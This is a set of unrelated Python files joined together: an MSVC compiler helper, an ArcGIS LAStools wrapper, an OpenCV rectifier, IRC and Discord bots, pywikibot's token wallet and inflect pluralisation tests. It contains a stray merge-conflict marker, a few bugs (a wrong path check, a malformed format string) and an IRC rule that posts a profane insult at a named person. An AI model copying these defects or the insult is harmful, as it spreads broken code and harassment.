# Prefer a debugging library if found (and requested), but deal
# with it if we don't have one.
if debug:
try_names = [lib + "_d", lib]
else:
try_names = [lib]
for dir in dirs:
for name in try_names:
libfile = os.path.join(dir, self.library_filename (name))
if os.path.exists(libfile):
return libfile
else:
# Oops, didn't find it in *any* of 'dirs'
return None
# Helper methods for using the MSVC registry settings
def find_exe(self, exe):
"""Return path to an MSVC executable program.
Tries to find the program in several places: first, one of the
MSVC program search paths from the registry; next, the directories
in the PATH environment variable. If any of those work, return an
absolute path that is known to exist. If none of them work, just
return the original program name, 'exe'.
"""
for p in self.__paths:
fn = os.path.join(os.path.abspath(p), exe)
if os.path.isfile(fn):
return fn
# didn't find it; try existing path
for p in os.environ['Path'].split(';'):
fn = os.path.join(os.path.abspath(p),exe)
if os.path.isfile(fn):
return fn
return exe
>>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
|
import sys, os, arcgisscripting, subprocess
def check_output(command,console):
if console == True:
process = subprocess.Popen(command)
else:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)
output,error = process.communicate()
returncode = process.poll()
return returncode,output
gp = arcgisscripting.create(9.3)
gp.AddMessage("Starting lasview ...")
argc = len(sys.argv)
lastools_path = os.path.dirname(os.path.dirname(os.path.dirname(sys.argv[0])))
if lastools_path.count(" ") > 0:
gp.AddMessage("Error. Path to .\\lastools installation contains spaces.")
gp.AddMessage("This does not work: " + lastools_path)
gp.AddMessage("This would work: C:\\software\\lastools")
sys.exit(1)
lastools_path = lastools_path + "\\bin"
if os.path.exists(lastools_path) == False:
gp.AddMessage("Cannot find .\\lastools\\bin at " + lastools_path)
sys.exit(1)
else:
gp.AddMessage("Found " + lastools_path + " ...")
lasview_path = lastools_path+"\\lasview.exe"
if os.path.exists(lastools_path) == False:
gp.AddMessage("Cannot find lasview.exe at " + lasview_path)
sys.exit(1)
else:
gp.AddMessage("Found " + lasview_path + " ...")
command = ['"'+lasview_path+'"']
if sys.argv[argc-1] == "true":
command.append("-v")
command.append("-i")
command.append('"'+sys.argv[1]+'"')
if sys.argv[2] != "5000000":
command.append("-points")
command.append(sys.argv[2])
if sys.argv[3] == "first returns":
command.append("-only_first")
elif sys.argv[3] == "last returns":
command.append("-only_last")
elif sys.argv[3] == "multi returns":
command.append("-only_multi")
elif sys.argv[3] == "single returns":
command.append("-only_single")
elif sys.argv[3] == "ground":
command.append("-ground")
elif sys.argv[3] == "buildings":
command.append("-buildings")
elif sys.argv[3] == "vegetation":
command.append("-vegetation")
elif sys.argv[3] == "objects":
command.append("-objects")
elif sys.argv[3] == "ground and buildings":
command.append("-ground_buildings")
elif sys.argv[3] == "ground and vegetation":
command.append("-ground_vegetation")
elif sys.argv[3] == "ground and objects":
command.append("-ground_objects")
if sys.argv[4] == "elevation ramp 1":
command.append("-color_by_elevation1")
elif sys.argv[4] == "elevation ramp 2":
command.append("-color_by_elevation2")
elif sys.argv[4] == "classification":
command.append("-color_by_classification")
elif sys.argv[4] == "rgb":
command.append("-color_by_rgb")
elif sys.argv[4] == "flight line":
command.append("-color_by_flight_line")
elif sys.argv[4] == "intensity":
command.append("-color_by_intensity")
elif sys.argv[4] == "number returns":
command.append("-color_by_returns")
if sys.argv[5] != "#":
command.append("-cp")
command.append('"'+sys.argv[5]+'"')
if sys.argv[6] != "#":
command.append("-cp_parse")
command.append(sys.argv[6])
if sys.argv[7] != "#":
additional_options = sys.argv[7].split()
for option in additional_options:
command.append(option)
gp.AddMessage("LAStools command line:")
command_length = len(command)
command_string = str(command[0])
command[0] = command[0].strip('"')
for i in range(1, command_length):
command_string = command_string + " " + str(command[i])
command[i] = command[i].strip('"')
gp.AddMessage(command_string)
returncode,output = check_output(command, False)
gp.AddMessage(str(output))
if returncode != 0:
gp.AddMessage("Error. lasview failed.")
sys.exit(1)
gp.AddMessage("Success. lasview done.")
|
import cv2
import pickle as pickle
class Rectify:
def __init__(self, path=None):
if not path:
path = "calibrate.pkl"
self.cdata = pickle.load(open(path, "rb"))
def rectify(self, img):
return cv2.remap(img, self.cdata['mapx'], self.cdata['mapy'], cv2.INTER_LINEAR)
if __name__ == "__main__":
r = Rectify()
src = cv2.imread("capture-gray.png")
dst = r.rectify(src)
cv2.imwrite("rectify-gray.png", dst)
src = cv2.imread("capture-color.png")
dst = r.rectify(src)
cv2.imwrite("rectify-color.png", dst)
cv2.imshow('color', dst)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
from sopel import *
import random
from itertools import repeat
@module.rule('.[Aa][Ll][Pp][Ii][Nn][Ee].*')
def alpine(bot, trigger):
bot.say('FUCK TAD')
|
from discord import Client
from discord.errors import Forbidden
from moneybot import config
from moneybot.command import get_command
from moneybot.exc import InvalidCommand, MoneybotException
from moneybot.ledger import update_balance, get_user_balance, transfer_balance
import discord
client = Client()
def get_contents(message):
if message.content.startswith("$"):
return message.content.strip("$").strip()
if message.content.startswith("<@"):
mentions = message.mentions
if not mentions:
return False
mention_id = message.mentions[0].id
me = message.server.me.id
template = "<@{}>".format(me)
if message.content.startswith(template):
return message.content.replace(template, "").strip()
return False
async def process_message(message):
if message.server is None:
return
author = message.author.id
server = message.server.id
contents = get_contents(message)
if contents:
tokens = contents.split()
Command = get_command(tokens[0])
if Command is not None:
command = Command(client, message, contents, tokens)
response = await command.perform()
if response:
await client.send_message(message.channel, response)
@client.event
async def on_message(message):
try:
await process_message(message)
except MoneybotException as e:
if e.args and e.public:
await client.send_message(message.channel, e.args[0])
else:
raise
except NotImplementedError:
await client.send_message(message.channel, "Not implemented yet!")
except Forbidden as e:
if e.code == 50013:
err = "Beep! Beep! I do not have permission to do that!"
await client.send_message(message.channel, err)
except Exception:
err = "Beep! Beep! You broke the bank. I hope you're satisfied."
await client.send_message(message.channel, err)
raise
def connect_to_discord():
client.run(config.DISCORD_TOKEN)
|
"""Objects representing api tokens."""
from pywikibot import debug
from pywikibot.exceptions import Error
_logger = 'site.tokenwallet'
class TokenWallet:
"""Container for tokens."""
def __init__(self, site) -> None:
"""Initializer.
:type site: pywikibot.site.APISite
"""
self.site = site
self._tokens = {}
self.failed_cache = set() # cache unavailable tokens.
def load_tokens(self, types, all: bool = False) -> None:
"""
Preload one or multiple tokens.
:param types: the types of token.
:type types: iterable
:param all: load all available tokens, if None only if it can be done
in one request.
"""
if self.site.user() is None:
self.site.login()
self._tokens.setdefault(self.site.user(), {}).update(
self.site.get_tokens(types, all=all))
# Preload all only the first time.
# When all=True types is extended in site.get_tokens().
# Keys not recognised as tokens, are cached so they are not requested
# any longer.
if all is not False:
for key in types:
if key not in self._tokens[self.site.user()]:
self.failed_cache.add((self.site.user(), key))
def __getitem__(self, key):
"""Get token value for the given key."""
if self.site.user() is None:
self.site.login()
user_tokens = self._tokens.setdefault(self.site.user(), {})
# always preload all for users without tokens
failed_cache_key = (self.site.user(), key)
# redirect old tokens to be compatible with older MW version
# https://www.mediawiki.org/wiki/MediaWiki_1.37/Deprecation_of_legacy_API_token_parameters
if self.site.mw_version >= '1.24wmf19' \
and key in {'edit', 'delete', 'protect', 'move', 'block', 'unblock',
'email', 'import', 'options'}:
debug(
'Token {!r} was replaced by {!r}'.format(key, 'csrf'), _logger)
key = 'csrf'
try:
key = self.site.validate_tokens([key])[0]
except IndexError:
raise Error(
"Requested token '{}' is invalid on {} wiki."
.format(key, self.site))
if (key not in user_tokens
and failed_cache_key not in self.failed_cache):
self.load_tokens([key], all=False if user_tokens else None)
if key in user_tokens:
return user_tokens[key]
# token not allowed for self.site.user() on self.site
self.failed_cache.add(failed_cache_key)
# to be changed back to a plain KeyError?
raise Error(
"Action '{}' is not allowed for user {} on {} wiki."
.format(key, self.site.user(), self.site))
def __contains__(self, key) -> bool:
"""Return True if the given token name is cached."""
return key in self._tokens.setdefault(self.site.user(), {})
def __str__(self) -> str:
"""Return a str representation of the internal tokens dictionary."""
return self._tokens.__str__()
def __repr__(self) -> str:
"""Return a representation of the internal tokens dictionary."""
return self._tokens.__repr__()
|
from nose.tools import eq_, assert_not_equal
import inflect
def is_eq(p, a, b):
return (p.compare(a, b) or
p.plnounequal(a, b) or
p.plverbequal(a, b) or
p.pladjequal(a, b))
def test_many():
p = inflect.engine()
data = get_data()
for line in data:
if 'TODO:' in line:
continue
try:
singular, rest = line.split('->', 1)
except ValueError:
continue
singular = singular.strip()
rest = rest.strip()
try:
plural, comment = rest.split('#', 1)
except ValueError:
plural = rest.strip()
comment = ''
try:
mod_plural, class_plural = plural.split("|", 1)
mod_plural = mod_plural.strip()
class_plural = class_plural.strip()
except ValueError:
mod_plural = class_plural = plural.strip()
if 'verb' in comment.lower():
is_nv = '_V'
elif 'noun' in comment.lower():
is_nv = '_N'
else:
is_nv = ''
p.classical(all=0, names=0)
mod_PL_V = p.plural_verb(singular)
mod_PL_N = p.plural_noun(singular)
mod_PL = p.plural(singular)
if is_nv == '_V':
mod_PL_val = mod_PL_V
elif is_nv == '_N':
mod_PL_val = mod_PL_N
else:
mod_PL_val = mod_PL
p.classical(all=1)
class_PL_V = p.plural_verb(singular)
class_PL_N = p.plural_noun(singular)
class_PL = p.plural(singular)
if is_nv == '_V':
class_PL_val = class_PL_V
elif is_nv == '_N':
class_PL_val = class_PL_N
else:
class_PL_val = class_PL
yield check_all, p, is_nv, singular, mod_PL_val, class_PL_val, mod_plural, class_plural
def check_all(p, is_nv, singular, mod_PL_val, class_PL_val, mod_plural, class_plural):
eq_(mod_plural, mod_PL_val)
eq_(class_plural, class_PL_val)
eq_(is_eq(p, singular, mod_plural) in ('s:p', 'p:s', 'eq'), True,
msg='is_eq(%s,%s) == %s != %s' % (singular, mod_plural, is_eq(p, singular, mod_plural), 's:p, p:s or eq'))
eq_(is_eq(p, mod_plural, singular) in ('p:s', 's:p', 'eq'), True,
msg='is_eq(%s,%s) == %s != %s' % (mod_plural, singular, is_eq(p, mod_plural, singular), 's:p, p:s or eq'))
eq_(is_eq(p, singular, class_plural) in ('s:p', 'p:s', 'eq'), True)
eq_(is_eq(p, class_plural, singular) in ('p:s', 's:p', 'eq'), True)
assert_not_equal(singular, '')
eq_(mod_PL_val, mod_PL_val if class_PL_val else '%s|%s' (mod_PL_val, class_PL_val))
if is_nv != '_V':
eq_(p.singular_noun(mod_plural, 1), singular,
msg="p.singular_noun(%s) == %s != %s" % (mod_plural, p.singular_noun(mod_plural, 1), singular))
eq_(p.singular_noun(class_plural, 1), singular,
msg="p.singular_noun(%s) == %s != %s" % (class_plural, p.singular_noun(class_plural, 1), singular))
'''
don't see any test data for this ???
elsif (/^\s+(an?)\s+(.*?)\s*$/)
{
$article = $1
$word = $2
$Aword = A($word)
ok ("$article $word" eq $Aword, "$article $word")
}
'''
def test_def():
p = inflect.engine()
p.defnoun("kin", "kine")
p.defnoun('(.*)x', '$1xen')
p.defverb('foobar', 'feebar',
'foobar', 'feebar',
'foobars', 'feebar')
p.defadj('red', 'red|gules')
eq_(p.no("kin", 0), "no kine", msg="kin -> kine (user defined)...")
eq_(p.no("kin", 1), "1 kin")
eq_(p.no("kin", 2), "2 kine")
eq_(p.no("regex", 0), "no regexen", msg="regex -> regexen (user defined)")
eq_(p.plural("foobar", 2), "feebar", msg="foobar -> feebar (user defined)...")
eq_(p.plural("foobars", 2), "feebar")
eq_(p.plural("red", 0), "red", msg="red -> red...")
eq_(p.plural("red", 1), "red")
eq_(p.plural("red", 2), "red")
p.classical(all=True)
eq_(p.plural("red", 0), "red", msg="red -> gules...")
eq_(p.plural("red", 1), "red")
eq_(p.plural("red", 2), "gules")
def test_ordinal():
p = inflect.engine()
eq_(p.ordinal(0), "0th", msg="0 -> 0th...")
eq_(p.ordinal(1), "1st")
eq_(p.ordinal(2), "2nd")
eq_(p.ordinal(3), "3rd")
eq_(p.ordinal(4), "4th")
eq_(p.ordinal(5), "5th")
eq_(p.ordinal(6), "6th")
eq_(p.ordinal(7), "7th")
eq_(p.ordinal(8), "8th")
eq_(p.ordinal(9), "9th")
eq_(p.ordinal(10), "10th")
eq_(p.ordinal(11), "11th")
eq_(p.ordinal(12), "12th")
eq_(p.ordinal(13), "13th")
eq_(p.ordinal(14), "14th")
eq_(p.ordinal(15), "15th")
eq_(p.ordinal(16), "16th")
eq_(p.ordinal(17), "17th")
eq_(p.ordinal(18), "18th")
eq_(p.ordinal(19), "19th")
eq_(p.ordinal(20), "20th")
eq_(p.ordinal(21), "21st")
eq_(p.ordinal(22), "22nd")
eq_(p.ordinal(23), "23rd")
eq_(p.ordinal(24), "24th")
eq_(p.ordinal(100), "100th")
eq_(p.ordinal(101), "101st")
eq_(p.ordinal(102), "102nd")
eq_(p.ordinal(103), "103rd")
eq_(p.ordinal(104), "104th")
eq_(p.ordinal('zero'), "zeroth", msg="zero -> zeroth...")
eq_(p.ordinal('one'), "first")
eq_(p.ordinal('two'), "second")
eq_(p.ordinal('three'), "third")
eq_(p.ordinal('four'), "fourth")
eq_(p.ordinal('five'), "fifth")
eq_(p.ordinal('six'), "sixth")
eq_(p.ordinal('seven'), "seventh")
eq_(p.ordinal('eight'), "eighth")
eq_(p.ordinal('nine'), "ninth")
eq_(p.ordinal('ten'), "tenth")
eq_(p.ordinal('eleven'), "eleventh")
eq_(p.ordinal('twelve'), "twelfth")
eq_(p.ordinal('thirteen'), "thirteenth")
eq_(p.ordinal('fourteen'), "fourteenth")
eq_(p.ordinal('fifteen'), "fifteenth")
eq_(p.ordinal('sixteen'), "sixteenth")
eq_(p.ordinal('seventeen'), "seventeenth")
eq_(p.ordinal('eighteen'), "eighteenth")
eq_(p.ordinal('nineteen'), "nineteenth")
eq_(p.ordinal('twenty'), "twentieth")
eq_(p.ordinal('twenty-one'), "twenty-first")
eq_(p.ordinal('twenty-two'), "twenty-second")
eq_(p.ordinal('twenty-three'), "twenty-third")
eq_(p.ordinal('twenty-four'), "twenty-fourth")
eq_(p.ordinal('one hundred'), "one hundredth")
eq_(p.ordinal('one hundred and one'), "one hundred and first")
eq_(p.ordinal('one hundred and two'), "one hundred and second")
eq_(p.ordinal('one hundred and three'), "one hundred and third")
eq_(p.ordinal('one hundred and four'), "one hundred and fourth")
def test_prespart():
p = inflect.engine()
eq_(p.present_participle("sees"), "seeing", msg="sees -> seeing...")
eq_(p.present_participle("eats"), "eating")
eq_(p.present_participle("bats"), "batting")
eq_(p.present_participle("hates"), "hating")
eq_(p.present_participle("spies"), "spying")
eq_(p.present_participle("skis"), "skiing")
def get_data():
return '''
a -> as # NOUN FORM
TODO:sing a -> some # INDEFINITE ARTICLE
TODO: A.C.R.O.N.Y.M. -> A.C.R.O.N.Y.M.s
abscissa -> abscissas|abscissae
Achinese -> Achinese
acropolis -> acropolises
adieu -> adieus|adieux
adjutant general -> adjutant generals
aegis -> aegises
afflatus -> afflatuses
afreet -> afreets|afreeti
afrit -> afrits|afriti
agendum -> agenda
aide-de-camp -> aides-de-camp
Alabaman -> Alabamans
albino -> albinos
album -> albums
Alfurese -> Alfurese
alga -> algae
alias -> aliases
alto -> altos|alti
alumna -> alumnae
alumnus -> alumni
alveolus -> alveoli
TODO:siverb am -> are
TODO:siverb am going -> are going
ambassador-at-large -> ambassadors-at-large
Amboinese -> Amboinese
Americanese -> Americanese
amoeba -> amoebas|amoebae
Amoyese -> Amoyese
TODO:siadj an -> some # INDEFINITE ARTICLE
analysis -> analyses
anathema -> anathemas|anathemata
Andamanese -> Andamanese
Angolese -> Angolese
Annamese -> Annamese
antenna -> antennas|antennae
anus -> anuses
apex -> apexes|apices
TODO:siadj apex's -> apexes'|apices' # POSSESSIVE FORM
aphelion -> aphelia
apparatus -> apparatuses|apparatus
appendix -> appendixes|appendices
apple -> apples
aquarium -> aquariums|aquaria
Aragonese -> Aragonese
Arakanese -> Arakanese
archipelago -> archipelagos
TODO:siverb are -> are
TODO:siverb are made -> are made
armadillo -> armadillos
arpeggio -> arpeggios
arthritis -> arthritises|arthritides
asbestos -> asbestoses
asparagus -> asparaguses
ass -> asses
Assamese -> Assamese
asylum -> asylums
asyndeton -> asyndeta
at it -> at them # ACCUSATIVE
ataman -> atamans
TODO:siverb ate -> ate
atlas -> atlases|atlantes
atman -> atmas
TODO:singular_noun attorney general -> attorneys general
attorney of record -> attorneys of record
aurora -> auroras|aurorae
auto -> autos
auto-da-fe -> autos-da-fe
aviatrix -> aviatrixes|aviatrices
TODO:siadj aviatrix's -> aviatrixes'|aviatrices'
Avignonese -> Avignonese
axe -> axes
TODO:singular_noun 2 anwers! axis -> axes
axman -> axmen
Azerbaijanese -> Azerbaijanese
bacillus -> bacilli
bacterium -> bacteria
Bahaman -> Bahamans
Balinese -> Balinese
bamboo -> bamboos
banjo -> banjoes
bass -> basses # INSTRUMENT, NOT FISH
basso -> bassos|bassi
bathos -> bathoses
beau -> beaus|beaux
beef -> beefs|beeves
beneath it -> beneath them # ACCUSATIVE
Bengalese -> Bengalese
bent -> bent # VERB FORM
bent -> bents # NOUN FORM
Bernese -> Bernese
Bhutanese -> Bhutanese
bias -> biases
biceps -> biceps
bison -> bisons|bison
blouse -> blouses
Bolognese -> Bolognese
bonus -> bonuses
Borghese -> Borghese
boss -> bosses
Bostonese -> Bostonese
box -> boxes
boy -> boys
bravo -> bravoes
bream -> bream
breeches -> breeches
bride-to-be -> brides-to-be
Brigadier General -> Brigadier Generals
britches -> britches
bronchitis -> bronchitises|bronchitides
bronchus -> bronchi
brother -> brothers|brethren
TODO: brother's -> brothers'|brethren's
buffalo -> buffaloes|buffalo
Buginese -> Buginese
buoy -> buoys
bureau -> bureaus|bureaux
Burman -> Burmans
Burmese -> Burmese
bursitis -> bursitises|bursitides
bus -> buses
buzz -> buzzes
buzzes -> buzz # VERB FORM
by it -> by them # ACCUSATIVE
caddis -> caddises
caiman -> caimans
cake -> cakes
Calabrese -> Calabrese
calf -> calves
callus -> calluses
Camaldolese -> Camaldolese
cameo -> cameos
campus -> campuses
can -> cans # NOUN FORM
can -> can # VERB FORM (all pers.)
can't -> can't # VERB FORM
candelabrum -> candelabra
cannabis -> cannabises
TODO:siverb canoes -> canoe
canto -> cantos
Cantonese -> Cantonese
cantus -> cantus
canvas -> canvases
CAPITAL -> CAPITALS
carcinoma -> carcinomas|carcinomata
care -> cares
cargo -> cargoes
caribou -> caribous|caribou
Carlylese -> Carlylese
carmen -> carmina
carp -> carp
Cassinese -> Cassinese
cat -> cats
catfish -> catfish
cayman -> caymans
Celanese -> Celanese
ceriman -> cerimans
cervid -> cervids
Ceylonese -> Ceylonese
chairman -> chairmen
chamois -> chamois
chaos -> chaoses
chapeau -> chapeaus|chapeaux
charisma -> charismas|charismata
TODO:siverb chases -> chase
chassis -> chassis
chateau -> chateaus|chateaux
cherub -> cherubs|cherubim
chickenpox -> chickenpox
chief -> chiefs
child -> children
Chinese -> Chinese
chorus -> choruses
chrysalis -> chrysalises|chrysalides
church -> churches
cicatrix -> cicatrixes|cicatrices
circus -> circuses
class -> classes
classes -> class # VERB FORM
clippers -> clippers
clitoris -> clitorises|clitorides
cod -> cod
codex -> codices
coitus -> coitus
commando -> commandos
compendium -> compendiums|compendia
coney -> coneys
Congoese -> Congoese
Congolese -> Congolese
conspectus -> conspectuses
contralto -> contraltos|contralti
contretemps -> contretemps
conundrum -> conundrums
corps -> corps
corpus -> corpuses|corpora
cortex -> cortexes|cortices
cosmos -> cosmoses
TODO:singular_noun court martial -> courts martial
cow -> cows|kine
cranium -> craniums|crania
crescendo -> crescendos
criterion -> criteria
curriculum -> curriculums|curricula
czech -> czechs
dais -> daises
data point -> data points
datum -> data
debris -> debris
decorum -> decorums
deer -> deer
delphinium -> delphiniums
desideratum -> desiderata
desman -> desmans
diabetes -> diabetes
dictum -> dictums|dicta
TODO:siverb did -> did
TODO:siverb did need -> did need
digitalis -> digitalises
dingo -> dingoes
diploma -> diplomas|diplomata
discus -> discuses
dish -> dishes
ditto -> dittos
djinn -> djinn
TODO:siverb does -> do
TODO:siverb doesn't -> don't # VERB FORM
dog -> dogs
dogma -> dogmas|dogmata
dolman -> dolmans
dominatrix -> dominatrixes|dominatrices
domino -> dominoes
Dongolese -> Dongolese
dormouse -> dormice
drama -> dramas|dramata
drum -> drums
dwarf -> dwarves
dynamo -> dynamos
edema -> edemas|edemata
eland -> elands|eland
elf -> elves
elk -> elks|elk
embryo -> embryos
emporium -> emporiums|emporia
encephalitis -> encephalitises|encephalitides
enconium -> enconiums|enconia
enema -> enemas|enemata
enigma -> enigmas|enigmata
epidermis -> epidermises
epididymis -> epididymises|epididymides
erratum -> errata
ethos -> ethoses
eucalyptus -> eucalyptuses
eunuch -> eunuchs
extremum -> extrema
eyas -> eyases
factotum -> factotums
farman -> farmans
Faroese -> Faroese
fauna -> faunas|faunae
fax -> faxes
Ferrarese -> Ferrarese
ferry -> ferries
fetus -> fetuses
fiance -> fiances
fiancee -> fiancees
fiasco -> fiascos
fish -> fish
fizz -> fizzes
flamingo -> flamingoes
flittermouse -> flittermice
TODO:siverb floes -> floe
flora -> floras|florae
flounder -> flounder
focus -> focuses|foci
foetus -> foetuses
folio -> folios
Foochowese -> Foochowese
foot -> feet
TODO:siadj foot's -> feet's # POSSESSIVE FORM
foramen -> foramens|foramina
TODO:siverb foreshoes -> foreshoe
formula -> formulas|formulae
forum -> forums
TODO:siverb fought -> fought
fox -> foxes
TODO:singular_noun 2 different returns from him -> from them
from it -> from them # ACCUSATIVE
fungus -> funguses|fungi
Gabunese -> Gabunese
gallows -> gallows
ganglion -> ganglions|ganglia
gas -> gases
gateau -> gateaus|gateaux
TODO:siverb gave -> gave
general -> generals
generalissimo -> generalissimos
Genevese -> Genevese
genie -> genies|genii
TODO:singular_noun 2 diff return values! genius -> geniuses|genii
Genoese -> Genoese
genus -> genera
German -> Germans
ghetto -> ghettos
Gilbertese -> Gilbertese
glottis -> glottises
Goanese -> Goanese
goat -> goats
goose -> geese
TODO:singular_noun Governor General -> Governors General
goy -> goys|goyim
graffiti -> graffiti
TODO:singular_noun 2 diff ret values graffito -> graffiti
grizzly -> grizzlies
guano -> guanos
guardsman -> guardsmen
Guianese -> Guianese
gumma -> gummas|gummata
TODO:siverb gumshoes -> gumshoe
gunman -> gunmen
gymnasium -> gymnasiums|gymnasia
TODO:siverb had -> had
TODO:siverb had thought -> had thought
Hainanese -> Hainanese
TODO:siverb hammertoes -> hammertoe
handkerchief -> handkerchiefs
Hararese -> Hararese
Harlemese -> Harlemese
harman -> harmans
harmonium -> harmoniums
TODO:siverb has -> have
TODO:siverb has become -> have become
TODO:siverb has been -> have been
TODO:siverb has-been -> has-beens
hasn't -> haven't # VERB FORM
Havanese -> Havanese
TODO:siverb have -> have
TODO:siverb have conceded -> have conceded
TODO:singular_noun 2 values he -> they
headquarters -> headquarters
Heavenese -> Heavenese
helix -> helices
hepatitis -> hepatitises|hepatitides
TODO:singular_noun 2 values her -> them # PRONOUN
TODO:singular_noun 2 values her -> their # POSSESSIVE ADJ
hero -> heroes
herpes -> herpes
TODO:singular_noun 2 values hers -> theirs # POSSESSIVE NOUN
TODO:singular_noun 2 values herself -> themselves
hetman -> hetmans
hiatus -> hiatuses|hiatus
highlight -> highlights
hijinks -> hijinks
TODO:singular_noun 2 values him -> them
TODO:singular_noun 2 values himself -> themselves
hippopotamus -> hippopotamuses|hippopotami
Hiroshiman -> Hiroshimans
TODO:singular_noun 2 values his -> their # POSSESSIVE ADJ
TODO:singular_noun 2 values his -> theirs # POSSESSIVE NOUN
TODO:siverb hoes -> hoe
honorarium -> honorariums|honoraria
hoof -> hoofs|hooves
Hoosierese -> Hoosierese
TODO:siverb horseshoes -> horseshoe
Hottentotese -> Hottentotese
house -> houses
housewife -> housewives
hubris -> hubrises
human -> humans
Hunanese -> Hunanese
hydra -> hydras|hydrae
hyperbaton -> hyperbata
hyperbola -> hyperbolas|hyperbolae
I -> we
ibis -> ibises
ignoramus -> ignoramuses
impetus -> impetuses|impetus
incubus -> incubuses|incubi
index -> indexes|indices
Indochinese -> Indochinese
inferno -> infernos
innings -> innings
TODO:singular_noun Inspector General -> Inspectors General
interregnum -> interregnums|interregna
iris -> irises|irides
TODO:siverb is -> are
TODO:siverb is eaten -> are eaten
isn't -> aren't # VERB FORM
it -> they # NOMINATIVE
TODO:siadj its -> their # POSSESSIVE FORM
itself -> themselves
jackanapes -> jackanapes
Japanese -> Japanese
Javanese -> Javanese
Jerry -> Jerrys
jerry -> jerries
jinx -> jinxes
jinxes -> jinx # VERB FORM
Johnsonese -> Johnsonese
Jones -> Joneses
jumbo -> jumbos
Kanarese -> Kanarese
Kiplingese -> Kiplingese
knife -> knives # NOUN FORM
knife -> knife # VERB FORM (1st/2nd pers.)
knifes -> knife # VERB FORM (3rd pers.)
Kongoese -> Kongoese
Kongolese -> Kongolese
lacuna -> lacunas|lacunae
lady in waiting -> ladies in waiting
Lapponese -> Lapponese
larynx -> larynxes|larynges
latex -> latexes|latices
lawman -> lawmen
layman -> laymen
leaf -> leaves # NOUN FORM
leaf -> leaf # VERB FORM (1st/2nd pers.)
leafs -> leaf # VERB FORM (3rd pers.)
Lebanese -> Lebanese
leman -> lemans
lemma -> lemmas|lemmata
lens -> lenses
Leonese -> Leonese
lick of the cat -> licks of the cat
Lieutenant General -> Lieutenant Generals
life -> lives
Liman -> Limans
lingo -> lingos
loaf -> loaves
locus -> loci
Londonese -> Londonese
Lorrainese -> Lorrainese
lothario -> lotharios
louse -> lice
Lucchese -> Lucchese
lumbago -> lumbagos
lumen -> lumens|lumina
lummox -> lummoxes
lustrum -> lustrums|lustra
lyceum -> lyceums
lymphoma -> lymphomas|lymphomata
lynx -> lynxes
Lyonese -> Lyonese
TODO: M.I.A. -> M.I.A.s
Macanese -> Macanese
Macassarese -> Macassarese
mackerel -> mackerel
macro -> macros
TODO:siverb made -> made
madman -> madmen
Madurese -> Madurese
magma -> magmas|magmata
magneto -> magnetos
Major General -> Major Generals
Malabarese -> Malabarese
Maltese -> Maltese
man -> men
mandamus -> mandamuses
manifesto -> manifestos
mantis -> mantises
marquis -> marquises
Mary -> Marys
maximum -> maximums|maxima
measles -> measles
medico -> medicos
medium -> mediums|media
TODO:siadj medium's -> mediums'|media's
medusa -> medusas|medusae
memorandum -> memorandums|memoranda
meniscus -> menisci
merman -> mermen
Messinese -> Messinese
metamorphosis -> metamorphoses
metropolis -> metropolises
mews -> mews
miasma -> miasmas|miasmata
Milanese -> Milanese
milieu -> milieus|milieux
millennium -> millenniums|millennia
minimum -> minimums|minima
minx -> minxes
miss -> miss # VERB FORM (1st/2nd pers.)
miss -> misses # NOUN FORM
misses -> miss # VERB FORM (3rd pers.)
TODO:siverb mistletoes -> mistletoe
mittamus -> mittamuses
Modenese -> Modenese
momentum -> momentums|momenta
money -> monies
mongoose -> mongooses
moose -> moose
mother-in-law -> mothers-in-law
mouse -> mice
mumps -> mumps
Muranese -> Muranese
murex -> murices
museum -> museums
mustachio -> mustachios
TODO:siadj my -> our # POSSESSIVE FORM
myself -> ourselves
mythos -> mythoi
Nakayaman -> Nakayamans
Nankingese -> Nankingese
nasturtium -> nasturtiums
Navarrese -> Navarrese
nebula -> nebulas|nebulae
Nepalese -> Nepalese
neuritis -> neuritises|neuritides
neurosis -> neuroses
news -> news
nexus -> nexus
Niasese -> Niasese
Nicobarese -> Nicobarese
nimbus -> nimbuses|nimbi
Nipponese -> Nipponese
no -> noes
Norman -> Normans
nostrum -> nostrums
noumenon -> noumena
nova -> novas|novae
nucleolus -> nucleoluses|nucleoli
nucleus -> nuclei
numen -> numina
oaf -> oafs
TODO:siverb oboes -> oboe
occiput -> occiputs|occipita
octavo -> octavos
octopus -> octopuses|octopodes
oedema -> oedemas|oedemata
Oklahoman -> Oklahomans
omnibus -> omnibuses
on it -> on them # ACCUSATIVE
onus -> onuses
opera -> operas
optimum -> optimums|optima
opus -> opuses|opera
organon -> organa
ottoman -> ottomans
ought to be -> ought to be # VERB (UNLIKE bride to be)
TODO:siverb overshoes -> overshoe
TODO:siverb overtoes -> overtoe
ovum -> ova
ox -> oxen
TODO:siadj ox's -> oxen's # POSSESSIVE FORM
oxman -> oxmen
oxymoron -> oxymorons|oxymora
Panaman -> Panamans
parabola -> parabolas|parabolae
Parmese -> Parmese
pathos -> pathoses
pegasus -> pegasuses
Pekingese -> Pekingese
pelvis -> pelvises
pendulum -> pendulums
penis -> penises|penes
penumbra -> penumbras|penumbrae
perihelion -> perihelia
person -> people|persons
persona -> personae
petroleum -> petroleums
phalanx -> phalanxes|phalanges
PhD -> PhDs
phenomenon -> phenomena
philtrum -> philtrums
photo -> photos
phylum -> phylums|phyla
piano -> pianos|piani
Piedmontese -> Piedmontese
pika -> pikas
TODO:singular_noun ret mul value pincer -> pincers
pincers -> pincers
Pistoiese -> Pistoiese
plateau -> plateaus|plateaux
play -> plays
plexus -> plexuses|plexus
pliers -> pliers
plies -> ply # VERB FORM
polis -> polises
Polonese -> Polonese
pontifex -> pontifexes|pontifices
portmanteau -> portmanteaus|portmanteaux
Portuguese -> Portuguese
possum -> possums
potato -> potatoes
pox -> pox
pragma -> pragmas|pragmata
premium -> premiums
prima donna -> prima donnas|prime donne
pro -> pros
proceedings -> proceedings
prolegomenon -> prolegomena
proof -> proofs
proof of concept -> proofs of concept
prosecutrix -> prosecutrixes|prosecutrices
prospectus -> prospectuses|prospectus
protozoan -> protozoans
protozoon -> protozoa
puma -> pumas
TODO:siverb put -> put
quantum -> quantums|quanta
TODO:singular_noun quartermaster general -> quartermasters general
quarto -> quartos
quiz -> quizzes
quizzes -> quiz # VERB FORM
quorum -> quorums
rabies -> rabies
radius -> radiuses|radii
radix -> radices
ragman -> ragmen
rebus -> rebuses
TODO:siverb rehoes -> rehoe
reindeer -> reindeer
TODO:siverb reshoes -> reshoe
rhino -> rhinos
